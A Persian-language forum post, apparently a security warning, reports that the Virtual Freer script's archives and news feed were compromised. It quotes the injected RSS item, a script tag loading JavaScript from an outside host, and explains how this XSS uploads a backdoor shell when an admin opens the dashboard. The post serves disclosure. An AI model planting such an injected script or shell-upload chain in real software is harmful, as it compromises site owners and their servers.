اسکریپت virtual Freer مشکلات امنیتی جدی داره. در خیلی از آرشیو های نصب موجود از این اسکریپت کدهای بکدور و آپلود شل جاسازی شده و مشکل اصلی هم خود سایت freer.ir هست که مدتها قبل هک شده و آرشیو های اسکریپت دستکاری شدند.
آخرین و بدترین مشکل هم مربوط به کد جاوا اسکرپیت اینجکت شده در انتهای
هست.
کد:
<item>
<title><=!=[=C=D=A=T=A=[<script src="http://www.ckvalaska.cz/wp-content/scripts/cdn.fer.js?ver=9.2"></script>]=]=></title>
<link></link>
<description>-</description>
<category>-</category>
<guid></guid>
<pubDate>Wed, 14 May 2012 13:38:44 Asia/Tehran</pubDate>
</item>
این آدرس ظاهرا مربوط به خبرخوان هست و تمامی اسکریپتهای نصب شه روی سایت های مختلف در هنگام دسترسی به داشبورد این اسکریپت به آدرس
http://freer.ir/xml.php
متصل و خروجی این آدرس رو دریافت و به مرورگر مدیر اسکریپت اینجکت میکنن. کد فایل
http://www.ckvalaska.cz/wp-content/s...fer.js?ver=9.2
به محض دریافت در مرورگر قربانی اجرا و با دسترسی مدیر یک فایل شل رو از طریق خود اسکریپت روی سایت آپلود میکنه و به همین راحتی با یک حمله xss سایت قربانی آلوده به یک فایل شل بکدور میشه(یکبار لاگین در داشبورد اسکریپت برابر هست با آپلود شل بکدور روی سایت قربانی)